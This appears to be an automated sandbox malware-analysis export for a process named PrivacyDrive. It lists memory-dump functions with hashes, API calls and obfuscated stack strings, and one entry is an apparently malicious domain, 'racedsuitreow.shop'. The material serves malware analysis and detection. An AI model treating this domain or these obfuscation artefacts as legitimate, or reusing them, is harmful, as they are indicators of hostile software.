Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8bf53a18c3d28959b3b7e29979ae87faec7114578b08e9828742aa937df777a
Instruction ID: 4a3cf2499b7370b69db8056b32fae249c2982a61ada926271800b69d9d2ba53b
Opcode Fuzzy Hash: d8bf53a18c3d28959b3b7e29979ae87faec7114578b08e9828742aa937df777a
Instruction Fuzzy Hash: 0FF0ECF56041106BDB23CD599CC0F3BFBACDB87254F194455E84557101D1615C54C3F7

Function 0480B3B2 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2042b291cc885411595e814b09f319313d63e5916f29e8bc63a26af0d8f5447
Instruction ID: 20e8242e40f7091f7dd988b74ddef17fed7bd29a54c75ef35017b4c0b8d1abf9
Opcode Fuzzy Hash: b2042b291cc885411595e814b09f319313d63e5916f29e8bc63a26af0d8f5447
Instruction Fuzzy Hash: C5F06D7081C2409BC300AF69C88491FFBF8EF92745F268D1CE0C5DB2A1D235E8A0CB66

Function 05A099B0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a642b93e05dd5abd0886c4126b494acd13082538a17e8d3644238f4b2615b33
Instruction ID: 9206d0016a02f34f4578346eb934ec5d9b8840f0666857f0337a2f3ed39e2e45
Opcode Fuzzy Hash: 8a642b93e05dd5abd0886c4126b494acd13082538a17e8d3644238f4b2615b33
Instruction Fuzzy Hash: 02F0673191C244AFC300AF2AD48492FFBF8EF86784F159D1CE0C5972A1D231C8A0CB66

Function 047C0ECF Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: bb4318ab06c5480c69f13168b4557c71217cc083b374cdb941a79b3c37ca8e46
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 7601B634A11188EFCB14DFA8C194AACB7B6FB44314F24819DE8059B784D730BF81DB80

Function 04802B02 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 39d80094f46587a259bf6ea7ea752c4540b4b7009d4994c9c1d9e90c10cf9c2c
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: FAD05B21608321465B648D199814477F7E4FA87711B85955EF581D3184D230EC41D169

Function 05A01100 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: c2fb58f579539e15a7efa07e6c67127a2bcdcf4e0ebb126b4752b75b25bf7f3d
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 85D05E21A0C221469B688E19A8019B7F7E0FA87B11B49A55EF592E3188D230D841C2A9

Function 047D7BF4 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: babbbec20277373ca4efb2e358d653785f90b3f3a970c42770f5635e692a0d64
Instruction ID: ba97814dd054028714ef4b57c09817dfd8c17ee44d5a46b9e5f4f4f6a93bf9ed
Opcode Fuzzy Hash: babbbec20277373ca4efb2e358d653785f90b3f3a970c42770f5635e692a0d64
Instruction Fuzzy Hash: 62E012319083518BEA14AF14CC1056EF3B2BF86708F019C1CD68977290EB35FE068B8B

Function 059D61F2 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d8d4eaff793f1d0b337fdf0ba240861c33c1dfc14251eb8f8c34ea2fb702ca
Instruction ID: 73a7d6870bb3ad2ef9353d2a253e657cff1e8f51cf34895d749f2b8ce813a160
Opcode Fuzzy Hash: e6d8d4eaff793f1d0b337fdf0ba240861c33c1dfc14251eb8f8c34ea2fb702ca
Instruction Fuzzy Hash: 19E0EC71A183558BCE11AB14941466EBBB1AB86310F016C1CE54977150DB32B9068BCB

Function 047F54B5 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c12d89730267a57265c5ff4f83e4dcdda70c47b379cd581d96b3031b7fdf2c30
Instruction ID: 16377979d0f7591ec9f18c1d3c73801e209d0b64eef3d901765740c17c739b8a
Opcode Fuzzy Hash: c12d89730267a57265c5ff4f83e4dcdda70c47b379cd581d96b3031b7fdf2c30
Instruction Fuzzy Hash: 37B09230A0810187D7880D389455337B1208307221F10B3BE2007F3181CE65CA82080C

Function 059F3AB3 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 890309341a178bc1cd1cbd4f98330bc9e6691cd2999ff868dd2b5cd0f5afa7f5
Instruction ID: 038ff170faa88e9a7dc9d45f0f438acfc169745509b04a2469ed5ca29fe6433f
Opcode Fuzzy Hash: 890309341a178bc1cd1cbd4f98330bc9e6691cd2999ff868dd2b5cd0f5afa7f5
Instruction Fuzzy Hash: 0AB09230A1C1018BD7880C38915633BB0208306220F10B3BD2007F3180CE25C982080C

Function 047DF835 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed41defb213639c12427ed227e5e8670bce3229be7b0c6efb41ca900001e68b1
Instruction ID: c1a5e67b750a83c601502dda47d3c6e4bc77d30b08142c2fa155a238d82611a7
Opcode Fuzzy Hash: ed41defb213639c12427ed227e5e8670bce3229be7b0c6efb41ca900001e68b1
Instruction Fuzzy Hash: A5B092E9C4020086E0142E203D85926B0280523205F14343AA8073330AF92EE118425B

Function 059DDE33 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fd4c91155f7e837a91f0bd080b4bc79024ccfd9925ba464db289bbe9b4db86d
Instruction ID: 569d9825572b04a43cbe64663987447c745941667493f5b37e46c4bbfe466e8c
Opcode Fuzzy Hash: 2fd4c91155f7e837a91f0bd080b4bc79024ccfd9925ba464db289bbe9b4db86d
Instruction Fuzzy Hash: 49B092E5E4820087D0502A703D9A42ABCAC165368AF0434B8981B62202A926E91A945B

Function 04800B62 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_47c0000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eddf7d5978aa49110249b5af0f03b4df7cfe6c3c773fb2c6384d10bcc9886f60
Instruction ID: a0779b4a2e78800a939fc1c378c59f014d6c37fe462950bea6febb7da0b28ad7
Opcode Fuzzy Hash: eddf7d5978aa49110249b5af0f03b4df7cfe6c3c773fb2c6384d10bcc9886f60
Instruction Fuzzy Hash: FCB09234A482008B8218CE04C080830B3F5EB0F602B042018E04967612C720F8008A08

Function 059FF160 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1efbb446094e8bc04bba313dc929781fe0ff9d4cddb087fa442418f1bd25d4a0
Instruction ID: 8ce7157d1bdbcb0336d7200e61976c50ed5707b3506d3019a0f4313d6550d02f
Opcode Fuzzy Hash: 1efbb446094e8bc04bba313dc929781fe0ff9d4cddb087fa442418f1bd25d4a0
Instruction Fuzzy Hash: 29B09234A582008B8614CE04C080870BBF5EB0F210B042408E04963601CB20F8008A08

Function 059F4C47 Relevance: 101.7, APIs: 1, Strings: 57, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 059F4CD6

Strings

f, xrefs: 059F4DA8
Q, xrefs: 059F4CFE
+, xrefs: 059F4D99
9, xrefs: 059F4DF3
%, xrefs: 059F4DB7
y, xrefs: 059F4D80
;, xrefs: 059F4E48
Y, xrefs: 059F4D1C
(, xrefs: 059F4D3A
n, xrefs: 059F4D26
K, xrefs: 059F4E39
3, xrefs: 059F4E11
1, xrefs: 059F4E3E
), xrefs: 059F4DA3
_, xrefs: 059F4E16
<, xrefs: 059F4D44
[, xrefs: 059F4DD0
P, xrefs: 059F4C69
\, xrefs: 059F4D08
7, xrefs: 059F4DFD
G, xrefs: 059F4DB2
0, xrefs: 059F4EFF
C, xrefs: 059F4DE4
2, xrefs: 059F4D76
1, xrefs: 059F4E1B
-, xrefs: 059F4D8F
g, xrefs: 059F4D9E
!, xrefs: 059F4DCB
, xrefs: 059F4D30
;, xrefs: 059F4DE9
G, xrefs: 059F4D6C
^, xrefs: 059F4D94
M, xrefs: 059F4E0C
D, xrefs: 059F4E02
I, xrefs: 059F4E43
5, xrefs: 059F4E07
?, xrefs: 059F4DD5
], xrefs: 059F4D12
Y, xrefs: 059F4D8A
R, xrefs: 059F4DC6
/, xrefs: 059F4D85
c, xrefs: 059F4C55
O, xrefs: 059F4E25
=, xrefs: 059F4DDF
O, xrefs: 059F4DF8
#, xrefs: 059F4DC1
u, xrefs: 059F4DBC
@, xrefs: 059F4D4E
G, xrefs: 059F4E4D
_, xrefs: 059F4C5F
G, xrefs: 059F4D62
E, xrefs: 059F4E57
M, xrefs: 059F4E2F
', xrefs: 059F4DAD
a, xrefs: 059F4CF4
v, xrefs: 059F4D58
F, xrefs: 059F4E52

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID: $!$#$%$'$($)$+$-$/$0$1$1$2$3$5$7$9$;$;$<$=$?$@$C$D$E$F$G$G$G$G$I$K$M$M$O$O$P$Q$R$Y$Y$[$\$]$^$_$_$a$c$f$g$n$u$v$y
API String ID: 2525500382-1333701383
Opcode ID: ac2b937dfec3316f56c3b328410d01438d86cc94a8deb41166b8902eab7e5f15
Instruction ID: 46a2e43179ebb2ff921805729764bbff3d4e2eba0183944920e73e5fb51ffe40
Opcode Fuzzy Hash: ac2b937dfec3316f56c3b328410d01438d86cc94a8deb41166b8902eab7e5f15
Instruction Fuzzy Hash: 3291746010C7C1CEE362DB68804875FFFE16BA6308F48599DE5D84B392C3BA8549CB67

Function 059F54AC Relevance: 101.6, APIs: 1, Strings: 57, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 059F553B

Strings

c, xrefs: 059F54BA
\, xrefs: 059F556D
R, xrefs: 059F562B
!, xrefs: 059F5630
9, xrefs: 059F5658
O, xrefs: 059F568A
Y, xrefs: 059F5581
/, xrefs: 059F55EA
f, xrefs: 059F560D
3, xrefs: 059F5676
=, xrefs: 059F5644
], xrefs: 059F5577
y, xrefs: 059F55E5
-, xrefs: 059F55F4
Y, xrefs: 059F55EF
G, xrefs: 059F55D1
(, xrefs: 059F559F
G, xrefs: 059F55C7
M, xrefs: 059F5671
, xrefs: 059F5595
;, xrefs: 059F564E
7, xrefs: 059F5662
1, xrefs: 059F5680
g, xrefs: 059F5603
P, xrefs: 059F54CE
[, xrefs: 059F5635
;, xrefs: 059F56AD
^, xrefs: 059F55F9
G, xrefs: 059F56B2
), xrefs: 059F5608
5, xrefs: 059F566C
E, xrefs: 059F56BC
Q, xrefs: 059F5563
M, xrefs: 059F5694
D, xrefs: 059F5667
n, xrefs: 059F558B
@, xrefs: 059F55B3
I, xrefs: 059F56A8
2, xrefs: 059F55DB
%, xrefs: 059F561C
0, xrefs: 059F5755
1, xrefs: 059F56A3
K, xrefs: 059F569E
v, xrefs: 059F55BD
C, xrefs: 059F5649
', xrefs: 059F5612
_, xrefs: 059F54C4
<, xrefs: 059F55A9
#, xrefs: 059F5626
_, xrefs: 059F567B
?, xrefs: 059F563A
G, xrefs: 059F5617
O, xrefs: 059F565D
u, xrefs: 059F5621
a, xrefs: 059F5559
+, xrefs: 059F55FE
F, xrefs: 059F56B7

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID: $!$#$%$'$($)$+$-$/$0$1$1$2$3$5$7$9$;$;$<$=$?$@$C$D$E$F$G$G$G$G$I$K$M$M$O$O$P$Q$R$Y$Y$[$\$]$^$_$_$a$c$f$g$n$u$v$y
API String ID: 2525500382-1333701383
Opcode ID: 1c6fdb960ecf8f675fe0da7a676394e8bfafde918d58b426c67ddef980a0d0cf
Instruction ID: 20d00b954d53081d04930e203c9de4f21f669cb4707a0b3d33e8a9adbc7856a7
Opcode Fuzzy Hash: 1c6fdb960ecf8f675fe0da7a676394e8bfafde918d58b426c67ddef980a0d0cf
Instruction Fuzzy Hash: 6A91837000D7C0CEE362D768948875FBFE16BA6308F48599DE1D84B392C7BA8549CB67

Function 059F7404 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 059F74B4

Strings

5, xrefs: 059F7536
%, xrefs: 059F74E6
?, xrefs: 059F7518
#, xrefs: 059F74DC
3, xrefs: 059F752C
', xrefs: 059F74F0
;, xrefs: 059F7504
^, xrefs: 059F763D
-, xrefs: 059F744A
/, xrefs: 059F743A
9, xrefs: 059F74FA
7, xrefs: 059F7540
., xrefs: 059F7442
=, xrefs: 059F750E
!, xrefs: 059F74D2
), xrefs: 059F742A
K, xrefs: 059F762D
1, xrefs: 059F7522
+, xrefs: 059F741A
0, xrefs: 059F76EE

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: AllocString
String ID: !$#$%$'$)$+$-$.$/$0$1$3$5$7$9$;$=$?$K$^
API String ID: 2525500382-2333071540
Opcode ID: bd1c385b440e2ab5dfbef614585e098f835d4ce0af7f58779abf83f5c6938368
Instruction ID: 5786367ba2bc0942ba95ed9d85f6ae38636cc001a030b6be4aff56ef5a5b3966
Opcode Fuzzy Hash: bd1c385b440e2ab5dfbef614585e098f835d4ce0af7f58779abf83f5c6938368
Instruction Fuzzy Hash: 4091726010C7C18ED332DB3C944879FBEE16BA6224F184A9DE1E94B3E2C7758546DB63

Function 059F5084 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 059F508E
VariantInit.OLEAUT32 ref: 059F50A1

Strings

C, xrefs: 059F5107
s, xrefs: 059F5187
{, xrefs: 059F5147
p=cu, xrefs: 059F50A1
E, xrefs: 059F50F7
o, xrefs: 059F51A7
u, xrefs: 059F5177
I, xrefs: 059F50D7
y, xrefs: 059F5157
G, xrefs: 059F50E7
q, xrefs: 059F5197
K, xrefs: 059F50C7
m, xrefs: 059F51B7
A, xrefs: 059F5117
}, xrefs: 059F5137
n, xrefs: 059F51AF
w, xrefs: 059F5167

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$C$E$G$I$K$m$n$o$p=cu$q$s$u$w$y${$}
API String ID: 2610073882-4063761926
Opcode ID: 944083f69ba5ca9afa1741fd6c88f8ad1c0f5019187e2107426fcbcbd71e4d5b
Instruction ID: 0a20c974d53851b1b076018d7729ec5ebf9026436b5172308822ba772e2933c5
Opcode Fuzzy Hash: 944083f69ba5ca9afa1741fd6c88f8ad1c0f5019187e2107426fcbcbd71e4d5b
Instruction Fuzzy Hash: 9A51027000C7C18ED332DB2890887DEBFE06BA6314F080A9DD1ED4A2D2C7795655C767

Function 059F64E0 Relevance: 31.6, APIs: 2, Strings: 16, Instructions: 84COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 059F64EA
VariantInit.OLEAUT32 ref: 059F64FD

Strings

c, xrefs: 059F6533
W, xrefs: 059F65D3
Q, xrefs: 059F65A3
_, xrefs: 059F6593
K, xrefs: 059F65F3
e, xrefs: 059F6543
p=cu, xrefs: 059F64FD
[, xrefs: 059F6573
], xrefs: 059F6583
J, xrefs: 059F65EB
g, xrefs: 059F6553
Y, xrefs: 059F6563
a, xrefs: 059F6523
U, xrefs: 059F65C3
I, xrefs: 059F65E3
S, xrefs: 059F65B3

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: I$J$K$Q$S$U$W$Y$[$]$_$a$c$e$g$p=cu
API String ID: 2610073882-1503443184
Opcode ID: f60a43f367d05c70291fb7bc02ec95b24690d9c37c7021efe24f8b67b28c8ab9
Instruction ID: b8fb89283b16c33f3e580bbf22d54160dc5378051354649c5b1f83b9a6419758
Opcode Fuzzy Hash: f60a43f367d05c70291fb7bc02ec95b24690d9c37c7021efe24f8b67b28c8ab9
Instruction Fuzzy Hash: FF51B17010DBC1CAE3329B289898BDBBFE0AB96315F084A5DD4ED8B392C7754145CB63

Function 059F6F46 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 79COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 059F6F50
VariantInit.OLEAUT32 ref: 059F6F63

Strings

e, xrefs: 059F6F94
S, xrefs: 059F6FDA
[, xrefs: 059F6FB2
a, xrefs: 059F6F80
U, xrefs: 059F6FE4
p=cu, xrefs: 059F6F63
W, xrefs: 059F6FEE
V, xrefs: 059F6FE9
Q, xrefs: 059F6FD0
], xrefs: 059F6FBC
c, xrefs: 059F6F8A
Y, xrefs: 059F6FA8
g, xrefs: 059F6F9E
_, xrefs: 059F6FC6

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Q$S$U$V$W$Y$[$]$_$a$c$e$g$p=cu
API String ID: 2610073882-548030397
Opcode ID: 3f2f164340ca4dde343dc3c55f511cd7a163d275953be288a4f7008ddd1befa4
Instruction ID: d7a6deec59e02680a3847fc5183ec0ee6d9be52a6c48a7dce41311b513800c38
Opcode Fuzzy Hash: 3f2f164340ca4dde343dc3c55f511cd7a163d275953be288a4f7008ddd1befa4
Instruction Fuzzy Hash: 6341E47000C7C19AD361DB28848875FBFE0AB96328F484A5DF4E9572D2C7B58509CB63

Function 059F7B1D Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 76COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 059F7B2F
VariantInit.OLEAUT32 ref: 059F7B42

Strings

S, xrefs: 059F7BB9
[, xrefs: 059F7B91
V, xrefs: 059F7BC8
c, xrefs: 059F7B69
_, xrefs: 059F7BA5
p=cu, xrefs: 059F7B42
W, xrefs: 059F7BCD
a, xrefs: 059F7B5F
], xrefs: 059F7B9B
Y, xrefs: 059F7B87
g, xrefs: 059F7B7D
e, xrefs: 059F7B73
U, xrefs: 059F7BC3
Q, xrefs: 059F7BAF

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Q$S$U$V$W$Y$[$]$_$a$c$e$g$p=cu
API String ID: 2610073882-548030397
Opcode ID: d09ce47bdf4ec7b04a6963ac17d819d26ee100349c5bbf10ad7402c110411afc
Instruction ID: d0c8316e789368c9450f69455c2dccf80c6482857a7e448cd97f2c9121856a71
Opcode Fuzzy Hash: d09ce47bdf4ec7b04a6963ac17d819d26ee100349c5bbf10ad7402c110411afc
Instruction Fuzzy Hash: 0741E27000C7C19AD351DB68948865FBFE0AB96328F581A8DF4E84B2D2C7B58549CB67

Function 059F77CB Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 92COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 059F7818

Strings

5, xrefs: 059F7873
?, xrefs: 059F78C3
!, xrefs: 059F7883
7, xrefs: 059F78E3
8, xrefs: 059F7833
(, xrefs: 059F78D3
&, xrefs: 059F7863
,, xrefs: 059F78B3
p=cu, xrefs: 059F7818
?, xrefs: 059F7853
0, xrefs: 059F7893
8, xrefs: 059F7843

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: InitVariant
String ID: !$&$($,$0$5$7$8$8$?$?$p=cu
API String ID: 1927566239-1734112512
Opcode ID: 06d7877d9663770e5e3c5b42f241b5285080fdb3eb7d07c7e9ae5914c7da79c3
Instruction ID: c99ebca36775d325b4e117bd5c846888735f50c5dd19b7e1ab6ed5c875cbccc0
Opcode Fuzzy Hash: 06d7877d9663770e5e3c5b42f241b5285080fdb3eb7d07c7e9ae5914c7da79c3
Instruction Fuzzy Hash: DA51A17010C7C58ED3369B6884597DEBFE0ABA6314F084A5DE5E98B392C7B44245CB93

Function 059F5A34 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 80COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 059F5A3E
VariantInit.OLEAUT32 ref: 059F5A51

Strings

4, xrefs: 059F5ACF
7, xrefs: 059F5AB7
3, xrefs: 059F5A97
:, xrefs: 059F5AFF
/, xrefs: 059F5AEF
', xrefs: 059F5B0F
5, xrefs: 059F5AA7
1, xrefs: 059F5A87
p=cu, xrefs: 059F5A51
?, xrefs: 059F5A77

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: Variant$ClearInit
String ID: '$/$1$3$4$5$7$:$?$p=cu
API String ID: 2610073882-2605028001
Opcode ID: 8c92974cde3e848de747812b7749489eff81b16f521b57741051ffe6c7b7b182
Instruction ID: 61713b9ec9149c075d4be2b41486b39af356d99491b8984077957df2db841371
Opcode Fuzzy Hash: 8c92974cde3e848de747812b7749489eff81b16f521b57741051ffe6c7b7b182
Instruction Fuzzy Hash: 5F41B77010C7C28ED332DB689058BEEBFE4ABA2314F048E6ED4E947692D7745185DB63

Function 059D2E57 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 287COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 059D2E6C

Strings

il^l, xrefs: 059D2F5B
ZW, xrefs: 059D31A4
[`ST, xrefs: 059D2F66
lebS, xrefs: 059D2F87
racedsuitreow.shop, xrefs: 059D32E0
kbe[, xrefs: 059D2F71
eg, xrefs: 059D318E

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: Uninitialize
String ID: ZW$[`ST$eg$il^l$kbe[$lebS$racedsuitreow.shop
API String ID: 3861434553-2430485684
Opcode ID: d0dcc164cfc8b392065a897b7b51fbf0a8ede901324ae7bacb5db32077941042
Instruction ID: 48c6cedd01fcba8458c5bfcdc7c76db295aeeebb89789d9416ffdefff1cf1a5b
Opcode Fuzzy Hash: d0dcc164cfc8b392065a897b7b51fbf0a8ede901324ae7bacb5db32077941042
Instruction Fuzzy Hash: A6B1307400E3C19AE7228F15C094BAEFBE4BF96345F58894DE4C99B282C7369106CB63

Function 059ECD5F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,F73009C7,00000000), ref: 059ECDFE
CopyFileW.KERNEL32(?,F73009C7,00000000,?,F73009C7,00000000), ref: 059ECE18

Strings

EA, xrefs: 059ECE5C
Kq, xrefs: 059ECE4C
rD, xrefs: 059ECE54

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID: CopyFile
String ID: EA$Kq$rD
API String ID: 1304948518-3130877478
Opcode ID: 14ec7a0297749064de13748c285cb3f4dde9c5c2c7df6749cd5cfd317f7243b2
Instruction ID: 2739a20fecfd40721880f0274a7b7476a549ae8d3dc70bf4a0b154045df33544
Opcode Fuzzy Hash: 14ec7a0297749064de13748c285cb3f4dde9c5c2c7df6749cd5cfd317f7243b2
Instruction Fuzzy Hash: F331CFB440D341ABE341DF04E488A1EBFE5AB96648F901D0CF0D59A221D379CA528FA7

Function 059F3EE0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

Strings

}jbg, xrefs: 059F4078
qbio, xrefs: 059F408C
qh>a, xrefs: 059F4082

Memory Dump Source

Source File: 00000010.00000002.1581270136.00000000059C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 059C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_59c1000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: qbio$qh>a$}jbg
API String ID: 0-1266614249
Opcode ID: e1ba8ae4180a048db10c144afa1f6e7182a5a57386795d34c198b5cc493888b8
